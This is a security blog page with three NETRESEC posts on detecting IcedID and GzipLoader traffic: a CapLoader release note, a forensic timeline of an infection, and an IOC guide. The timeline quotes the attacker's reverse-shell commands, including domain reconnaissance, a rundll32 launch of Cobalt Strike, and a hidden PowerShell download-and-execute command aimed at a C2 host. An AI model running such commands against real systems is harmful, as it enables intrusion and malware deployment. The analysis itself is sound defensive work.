NETRESEC Network Security Blog - Tag : GzipLoader

rss Google News

CapLoader 1.9.6 Released

CapLoader 1.9.6

CapLoader now detects even more malicious protocols and includes several new features such as JA4 fingerprints, API support for sharing IOCs to ThreatFox and OSINT lookups of malware families on Malpedia. The new CapLoader 1.9.6 release also comes with several improvements of the user interface, for example interactive filtering of flows and services with regular expressions.

Detection of Malware C2 Protocols

Malware authors continually keep coming up with new C2 protocols for defenders to detect. Luckily we don’t need to manually create protocol signatures for CapLoader, we only need a few examples of traffic for a protocol to generate a statistical model that CapLoader can use to detect that protocol. We call this feature Port Independent Protocol Identification (PIPI).

We’ve added support for detecting of the following protocols in this new release of CapLoader:

Malicious protocols detected by CapLoader

Image: Protocols identified in PCAP files with malware traffic from various sandboxes (ANY.RUN, Hybrid-Analysis, Joe Sandbox and Triage)

Our PIPI feature can also detect protocols inside of other protocols, such as Cobalt Strike, DCRat, Emotet, Formbook, Gozi ISFB, GzipLoader and Socks5Systemz which all run on top of HTTP. It is sometimes even possible to identify malicious protocols that use TLS encryption, such as AsyncRAT, Cobalt Strike, Emotet, IcedID or Remcos. However, detection of malicious TLS encrypted protocols is a difficult challenge and might be subject to false positives.

Sharing IOCs to ThreatFox

ThreatFox is a free online service for sharing indicators of compromise (IOCs) from malware. ThreatFox can be queried for a particular malware family, such as RedLine Stealer, and it’ll return a list of URLs, domain names and IP:port pairs used for C2 communication or payload delivery for that malware. You can also query for a domain or IP address to see if it’s a known C2 address of any malware or botnet.

CapLoader has supported OSINT lookup of IP addresses and domains on ThreatFox since the release of version 1.9, but with this release we also add the ability to contribute by sharing IOCs with the infosec community. All you need to do is to enter your ThreatFox API-key in CapLoader’s settings, then right-click a flow, service or alert and select “Submit to ThreatFox”.

Submitting Loda IOC to ThreatFox

Image: Submission of microsoft.net.linkpc[.]net to ThreatFox

If the right-clicked item is an alert for a “Malicious protocol” then CapLoader will automatically populate the Mapledia Name field, as shown in the screenshot (win.loda).

TLS Client Fingerprinting with JA4

John Althouse announced the new JA4+ fingerprint methods a couple of months ago on the FoxIO blog. In short JA4+ is a suite of methods designed to fingerprint implementations of a specific set of protocols, including TLS, HTTP and SSH. As you’ve probably guessed JA4+ is a successor to the JA3 and JA3S hashes that we’ve learned to love (we added JA3 fingerprinting to NetworkMiner in 2019).

Most of the fingerprinting methods in the JA4+ suite are patent pending except for the TLS client fingerprinting method “JA4”, which FoxIO does not have patent claims and is not planning to pursue patent coverage for. We have therefore built a JA4 fingerprinting engine that we’ve included in this CapLoader release. Future releases of NetworkMiner will hopefully also include our JA4 fingerprinting engine.

JA3 and JA4 fingerprints of Remcos traffic. a85be79f7b569f1df5e6087b69deb493 t13i010400_0f2cb44170f4_5c4c70b73fa0 t13i010400_0f2cb44170f4_1b583af8cc09

Image: JA3 and JA4 hashes of Remcos C2 traffic

JA4 is similar to JA3 in many ways, but one essential difference is that JA4 fingerprints are something of a fuzzy hash of the client’s handshake rather than a MD5 hash of the raw fingerprint. JA3’s use of MD5 hashing has received criticism, for example in academic literature, partly due to the inability to see if two JA3 hashes have similar TLS handshakes.

JA4 hash explained. Breakdown of Remcos JA4 hash t13i010400_0f2cb44170f4_5c4c70b73fa0

JA4 does use hashes, but instead of just being one big hash it breaks the fingerprint into three separate sections; where the first section is used in its raw (non-hashed) format and the other two sections are hashed separately. Thus, an update of a TLS implementation, which only adds one additional cipher, will increment the cipher counter in the first section of the JA4 fingerprint by one and the ciphers hash (second section) will get a new value. The hash in the last section will remain intact.

In the previous CapLoader screenshot with Remcos C2 traffic we see TLS handshakes that have the same JA3 hash (a85be79f7b569f1df5e6087b69deb493) but the JA4 fingerprints have different values (t13i010400_0f2cb44170f4_5c4c70b73fa0 and t13i010400_0f2cb44170f4_1b583af8cc09). The reason why the last JA4 section is different even though the JA3 hash is the same is because some of these TLS handshakes present a different set of signature algorithms, which is a parameter that isn't being used in JA3.

Alerts Tab

CapLoader’s Alerts tab now includes more alert types than before and each alert has a severity rating graded as follows:

  • High = 4
  • Medium = 3
  • Low = 2
  • Info = 1

A typical high-severity alert is when a known malicious protocol is detected, while an “Info” type alert can provide a heads up about traffic from things like coin mining or legitimate remote admin tools. As you can see in the screenshot below the alerts are sorted based on severity to make it easier to prioritize them.

Alerts in CapLoader for 2023-10-16-IcedID-infection.pcap

Image: CapLoader alerts for 2023-10-16-IcedID-infection.pcap

Here’s a breakdown of the alerts shown in the CapLoader screenshot above:

All these alerts are indicators of an IcedID infection, including the 5 minute C2 connection interval which I have mentioned before.

Other User Interface Improvements

CapLoader’s “Column Criteria” row filter could previously only be used to filter on columns with a specific value, such as “Protocol = TLS”. This new release of CapLoader additionally allows users to do substring matching with the “contains” keyword and regular expression (regex) matching with the “matching” keyword. In the screenshot below the Column Criteria “Hostname matches \.local$” is used to only show hosts that have a hostname ending with “.local”.

RegEx matching of .local hostnames

We’ve also added an often asked for feature to CapLoader, namely the ability to switch between different flows in the Transcript window.

CapLoader Transcript. Change this number to show next flow

The flows you can switch between depends on how the transcript window was opened. A flow transcript opened from the Flows tab will allow switching between the flows that were visible in the list from where the transcript was opened. A transcript opened from any of the other tabs (Services, Hosts or Alerts), on the other hand, allows switching between the different flows for the particular service, host or alert that was opened.

Credits

I would like to thank Nic Cerny, Trent Healy and Fredrik Ginsberg for their input on various improvements that have been implemented in CapLoader 1.9.6.

Updating to the Latest Release

Users who have already purchased a license for CapLoader can download a free update to version 1.9.6 from our customer portal or by clicking “Check for Updates” in CapLoader’s Help menu.

Posted by Erik Hjelmvik on Wednesday, 15 November 2023 12:08:00 (UTC/GMT)

Tags: #CapLoader#ThreatFox#JA3#JA4#IcedID#GzipLoader#regex

Short URL: https://netresec.com/?b=23B6bcd


Forensic Timeline of an IcedID Infection

The BackConnect and VNC parsers that were added to NetworkMiner 2.8.1 provide a unique possibility to trace the steps of an attacker with help of captured network traffic from a hacked computer.

In this blog post I use the free and open source version of NetworkMiner to see how GzipLoader downloads IcedID, after which the attacker deploys BackConnect VNC to purchase an iPhone 14 with a stolen credit card and then drops Cobalt Strike on the victim PC.

The analyzed pcap is 2022-10-31-IcedID-with-DarkVNC-and-Cobalt-Strike-full-pcap-raw.pcap from Brad Duncan's malware-traffic-analysis.net blog.

Safety First

I ran NetworkMiner in a Windows Sandbox when analyzing this PCAP file to avoid accidentally infecting my computer with any of the malicious artifacts that NetworkMiner extracts from the network traffic.

Another safe way to analyze Windows malware is to run NetworkMiner in Linux or macOS.

14:47 GzipLoader

This infection starts with GzipLoader (aka “IcedID Downloader”) reaching out to its C2 server on vgiragdoffy[.]com (67.205.184.237:80) to download IcedID.

Cookie parameters from GzipLoader request in NetworkMiner 2.8.1
Image: Cookie parameters from GzipLoader request

The “_gat” cookie value in frame number 6 tells us that the victim machine is running a Windows 10 build 19045 (aka 22H2). The long “_u” value contains the victim’s username and hostname in hexadecimal representation and the “__io” value is the logged in user’s SID. NetworkMiner decodes these values from the GzipLoader request and displays them in the Hosts tab.

Hostname, SID, username and Windows version extracted from GzipLoader cookie by NetworkMiner 2.8.1
Image: Hostname, SID, username and Windows version extracted from GzipLoader cookie

For more info about the GzipLoader cookie, see IcedID PhotoLoader evolution by Jason Reaves and the eSentire blog post on Gootloader and IcedID.

The response for this GzipLoader request is a 550 kB file (MD5 700c602086590b05dde8df57933c7e68) with a fake gzip header. This file actually contains the IcedID DLL (Odwikp.dll) and license.dat files.

Fake gzip file containing IcedID
Image: Fake gzip file containing IcedID

14:47 IcedID

The banking trojan IcedID (aka BokBot) gets launched at 14:47:29 UTC (frame 641) after which it connects to these four IcedID servers used for payload delivery and C2:

  • ringashopsu[.]com = 137.184.208.116
  • sainforgromset[.]com = 138.68.255.102
  • yeloypod[.]hair = 94.140.114.103
  • airsaintol[.]beauty = 66.63.168.75

NetworkMiner hosts details for IcedID C2 server showing JA3S hash ec74a5c51106f0419184d0dd08fb05bc
Image: JA3S hash of C2 server

These four IcedID servers all run TLS servers with self signed certificates issued for "localhost" and doing TLS handshakes with JA3S hash ec74a5c51106f0419184d0dd08fb05bc. Both these properties can be used as filters in NetworkMiner's Hosts tab to only display the IcedID C2 servers.

Self-signed X.509 certificate issued to localhost from ringashopsu[.]com with thumbprint d14983ecbe0f97023721d0960f5dc98388809cc9
Image: Self-signed certificate from ringashopsu[.]com

14:59 BackConnect and Keyhole VNC

Shortly after the IcedID C2 traffic has been started the IcedID bot also initiates BackConnect C2 connections to 137.74.104.108 on TCP port 8080 (frame 4505 at 14:59:14 UTC).

IcedID BackConnect communication in NetworkMiner 2.8.1
Image: IcedID BackConnect communication

The BackConnect C2 server tells the bot to sleep for 60 seconds two times before launching a reverse VNC session with command 0x11 (frame 4530 at 15:01.09 UTC).

VNC desktop screenshots extracted by NetworkMiner
Image: BackConnect VNC screenshots
Screenshot of attacker’s view of victim screen (Keyhole VNC)
Image: Screenshot of attacker’s view of victim screen (Keyhole VNC)

15:06 Apple Store

Attacker’s keystrokes extracted from BackConnect VNC traffic
Image: Attacker’s keystrokes extracted from BackConnect VNC traffic

The keylog of the attacker above reveals that the attacker is typing “iphone 14 apple store buy”. The VNC graphics that NetworkMiner extracted from the PCAP file additionally reveal that this was a Google search query typed into an Edge browser.

Google search results from reverse VNC session
Image: Google search results from reverse VNC session

15:10 Credit Card payment

The attacker proceeds to the Apple Store, puts a black iPhone 14 Plus for $987.99 into the shopping cart, enters a delivery address in West Hartford (US) and then inputs credit card details for the payment.

Credit card details entered in Apple Store by attacker
Image: Credit card details entered in Apple Store by attacker

Luckily, the transaction was denied by Apple Store.

Error message from Apple Store: Your payment authorization failed
Image: Payment authorization failed

15:12 Reverse Shell

After having failed to buy an iPhone through the hacked computer the attacker instead deploys three reverse shell sessions using the BackConnect C2 channel.

Frame 143574 on 15:12:30, Frame 144299 on 15:38:22, Frame 147667 on 15:49:32

These three commands are issued in the first reverse shell session:

net group "domain admins" /dom
arp -a
dir \\172.16.0.12\c$

In the second shell session the attacker first runs these three commands:

shell net group "domain admins" /dom
net group "domain admins" /dom
nltest /domain_trusts /all_trusts

...and then starts a file manager session through the BackConnect C2 channel.

15:40 Deploy Cobalt Strike

The BackConnect file manager is used to upload a Cobalt Strike binary called P2.dll to "C:\ProgramData\" on the victim computer in frame 144535.

NetworkMiner 2.8.1 showing CobaltStrike delivered to victim through BackConnect's File Manager
Image: CobaltStrike delivered to victim through BackConnect's File Manager

The uploaded P2.dll is then executed by running this command in the reverse shell session (frame 144707):

rundll32 c:\programdata\P2.dll,DllRegisterServer

NetworkMiner extracts this uploaded DLL from the BackConnect network traffic.

Files extracted by NetworkMiner from network traffic, including Cobalt Strike P2.dll
Image: Files extracted from network traffic Details for Cobalt Strike P2.dll with MD5 hash cc69a31a067b62dda5f2076f8ee335e1
Image: Details for Cobalt Strike P2.dll

VirusTotal results 46 of 71 for P2.dll cc69a31a067b62dda5f2076f8ee335e1 As you can see in the screenshot above, the MD5 hash of P2.dll is cc69a31a067b62dda5f2076f8ee335e1. This file is flagged as malicious by most AV vendors (P2.dll on VT). However, none of them label it as Cobalt Strike. Luckily I was able to use Triage's malware config extractor to verify that this was indeed Cobalt Strike (P2.dll on tria.ge). Triage also revealed that the CobaltStrike C2 URL was
clouditsoft[.]com:8008/static-directory/mg.jpg

After the DLL gets executed the victim PC establishes Cobalt Strike beacon C2 connections to clouditsoft[.]com on port 8008 (frame 144715).

Cobalt Strike beacon sessions
Image: Cobalt Strike beacon sessions

15:41 MOAR COBALT STRIKE

The BackConnect Reverse Shell log in NetworkMiner's Parameters tab shows that the attacker also attempted to download Cobalt Strike using PowerShell at 15:41:59 UTC (frame 145176) with this command:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('https://clouditsoft[.]com:8008/lass'))"

IOC List

  • IP:port 67.205.184.237:80 (GzipLoader)
  • DNS vgiragdoffy[.]com (GzipLoader)
  • MD5 700c602086590b05dde8df57933c7e68 (Fake gzip file)
  • MD5 f57ab2e5e5720572d5eb19010ec8dcb4 (IcedID Odwikp.dll from fake gzip)
  • MD5 57a9d9acb389bd74a7423a16ef81ac18 (IcedID license.dat from fake gzip)
  • DNS ringashopsu[.]com (IcedID C2)
  • DNS sainforgromset[.]com (IcedID C2)
  • DNS yeloypod[.]hair (IcedID C2)
  • DNS airsaintol[.]beauty (IcedID C2)
  • IP:port 137.184.208.116:443 (IcedID C2)
  • IP:port 138.68.255.102:443(IcedID C2)
  • IP:port 94.140.114.103:443 (IcedID C2)
  • IP:port 66.63.168.7:443 (IcedID C2)
  • JA3S hash ec74a5c51106f0419184d0dd08fb05bc (IcedID C2)
  • IP:port 137.74.104.108:8080 (IcedID BackConnect C2)
  • MD5 cc69a31a067b62dda5f2076f8ee335e1 (CobaltStrike P2.dll)
  • DNS clouditsoft[.]com (CobaltStrike C2)
  • IP:port 198.44.140.67:8008 (CobaltStrike C2)

Posted by Erik Hjelmvik on Thursday, 12 October 2023 13:23:00 (UTC/GMT)

Tags: #NetworkMiner#IcedID#GzipLoader#BackConnect#VNC#CobaltStrike#Cobalt Strike#Windows Sandbox#ec74a5c51106f0419184d0dd08fb05bc#JA3S

Short URL: https://netresec.com/?b=23A4de6


How to Identify IcedID Network Traffic

Brad Duncan published IcedID (Bokbot) from fake Microsoft Teams page earlier this week. In this video I take a closer look at the PCAP file in that blog post.

Note: This video was recorded in a Windows Sandbox to minimize the risk of infecting the host PC in case of accidental execution of a malicious payload from the network traffic.

As I have previously pointed out, IcedID sends beacons to the C2 server with a 5 minute interval. According to Kai Lu’s blog post A Deep Dive Into IcedID Malware: Part 2, this 5 minute interval is caused by a call to WaitForSingleObject with a millisecond timeout parameter of 0x493e0 (300,000), which is exactly 5 minutes.

UPDATE 2023-03-22

In the research paper Thawing the permafrost of ICEDID Elastic Security Labs confirm that IcedID's default polling interval is 5 minutes. They also mention that this interval is configurable:

Once initialized, ICEDID starts its C2 polling thread for retrieving new commands to execute from one of its C2 domains. The polling loop checks for a new command every N seconds as defined by the g_c2_polling_interval_seconds global variable. By default this interval is 5 minutes, but one of the C2 commands can modify this variable.

The IcedID trojan uses a custom BackConnect protocol in order to interact with victim computers through VNC, a file manager or by establishing a reverse shell. There was no IcedID BackConnect traffic in this particular PCAP file though, but severalother IcedID capture files published on malware-traffic-analysis.net do contain IcedID BackConnect traffic. For more information on this proprietary protocol, please see our blog post IcedID BackConnect Protocol.

IOC List

Fake Microsoft Teams download page

  • URL: hxxp://microsofteamsus[.]top/en-us/teams/download-app/
  • MD5: 5dae65273bf39f866a97684e8b4b1cd3
  • SHA256: e365acb47c98a7761ad3012e793b6bcdea83317e9baabf225d51894cc8d9e800
  • More info: urlscan.io

IcedID GzipLoader

  • Filename: Setup_Win_13-02-2023_16-33-14.exe
  • MD5: 7327fb493431fa390203c6003bd0512f
  • SHA256: 68fcd0ef08f5710071023f45dfcbbd2f03fe02295156b4cbe711e26b38e21c00
  • More info: Triage

IcedID payload disguised as fake gzip file

  • URL: hxxp://alishabrindeader[.]com/
  • MD5: 8e1e70f15a76c15cc9a5a7f37c283d11
  • SHA256: 7eb6e8fdd19fc6b852713c19a879fe5d17e01dc0fec62fa9dec54a6bed1060e7
  • More info: IcedID GZIPLOADER Analysis by Binary Defense

IcedID C2 communication

  • IP and port: 192.3.76.227:443
  • DNS: treylercompandium[.]com
  • DNS: qonavlecher[.]com
  • X.509 certificate SHA1: b523e3d33e7795de49268ce7744d7414aa37d1db
  • X.509 certificate SHA256: f0416cff86ae1ecc1570cccb212f3eb0ac8068bcf9c0e3054883cbf71e0ab2fb
  • JA3: a0e9f5d64349fb13191bc781f81f42e1
  • JA3S: ec74a5c51106f0419184d0dd08fb05bc
  • Beacon interval: 5 minutes
  • More info: ThreatFox

Network Forensics Training

Check out our upcoming live network forensics classes for more hands-on network forensic analysis. Our current class material doesn’t include any IcedID traffic though, instead you’ll get to investigate C2 traffic from Cobalt Strike, TrickBot, njRAT, Meterpreter and a few others.

Posted by Erik Hjelmvik on Wednesday, 15 February 2023 10:52:00 (UTC/GMT)

Tags: #IcedID#CapLoader#Video#Periodicity#GzipLoader#a0e9f5d64349fb13191bc781f81f42e1#ec74a5c51106f0419184d0dd08fb05bc

Short URL: https://netresec.com/?b=23242ad

X / twitter

NETRESEC on X / Twitter: @netresec

Mastodon

NETRESEC on Mastodon: @netresec@infosec.exchange